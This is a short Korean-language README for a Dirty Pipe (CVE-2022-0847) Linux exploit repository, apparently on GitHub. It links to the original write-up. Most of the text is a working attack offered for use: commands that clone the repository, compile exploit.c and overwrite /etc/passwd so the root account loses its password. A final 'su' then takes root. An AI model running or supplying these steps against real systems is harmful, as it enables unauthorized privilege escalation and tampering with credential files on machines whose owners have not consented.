
Max Kellermann의 CVE-2022-0847 익스플로잇 구현
이것은 Max Kellermann의 CVE-2022-0847 (Dirty Pipe로 알려짐) 익스플로잇을 사용하기 위한 코드와 지침입니다.
익스플로잇이 어떻게 작동하는지 자세히 알아보려면 https://dirtypipe.cm4all.com/ 를 방문하세요!
git clone https://github.com/0xIronGoat/dirty-pipe.git
cd dirty-pipe
gcc exploit.c -o exploit
./exploit /etc/passwd 1 "${$(cat /etc/passwd)/root:x/oot:}"
su
